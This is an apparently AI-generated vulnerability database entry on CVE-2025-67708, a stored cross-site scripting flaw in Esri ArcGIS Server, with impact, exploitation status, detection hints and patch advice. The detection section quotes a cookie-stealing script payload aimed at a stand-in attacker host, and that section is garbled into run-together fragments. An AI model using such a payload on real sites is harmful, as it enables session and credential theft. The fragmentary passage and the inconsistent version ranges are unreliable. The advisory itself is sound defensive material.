
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67708 is a stored cross-site scripting (XSS) vulnerability in Esri ArcGIS Server versions 11.4 and earlier on both Windows and Linux platforms. In certain configurations, a remote unauthenticated attacker can store files containing malicious code on the server, which may then execute in the context of a victim's browser. The vulnerability was published on December 31, 2025, and a patch was made available via the ArcGIS Server Security 2025 Update 2 release. It carries a CVSS v3.1 base score of 6.1 (Medium) (Esri Advisory, EUVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) XSS variant. In certain ArcGIS Server configurations, the application fails to adequately sanitize or restrict file uploads or content submissions from unauthenticated users, allowing malicious scripts to be persisted on the server. When a victim subsequently accesses the affected resource through their browser, the stored malicious code executes within the browser's security context. No authentication or elevated privileges are required by the attacker, though user interaction (a victim visiting the malicious content) is necessary for exploitation (Esri Advisory, EUVD).
Successful exploitation could allow an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the ArcGIS Server web interface. This may lead to session hijacking, credential theft, unauthorized data access, or further malicious actions against authenticated users of the platform. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the victim's browser environment, affecting both confidentiality and integrity at a low level, with no direct availability impact (EUVD).
As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (EUVD). The EPSS score is approximately 0.04%, indicating a low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires no authentication but does require a victim to interact with the maliciously stored content.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) designed to execute in a victim's browser..html, .js, or script-containing content from anonymous users.<script> tags or JavaScript payloads in ArcGIS Server web-accessible directories or upload folders.Esri has released the ArcGIS Server Security 2025 Update 2 patch to address this vulnerability; organizations running ArcGIS Server versions 10.9.1 through 11.4 should apply this patch immediately (Esri Advisory). As an interim measure for organizations unable to patch immediately, implement network-level controls to restrict unauthenticated access to ArcGIS Server endpoints, particularly those that allow file uploads or content submissions. Additionally, educate users to avoid clicking on suspicious links or accessing untrusted content within the ArcGIS Server environment.
The vulnerability received limited public attention at the time of disclosure, with coverage primarily from automated vulnerability tracking services and aggregators such as Vulners, VulDB, and CIRCL's vulnerability lookup. A brief mention appeared on Bluesky via automated CVE tracking accounts. No significant researcher commentary, vendor statements beyond the patch advisory, or major media coverage has been identified for this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."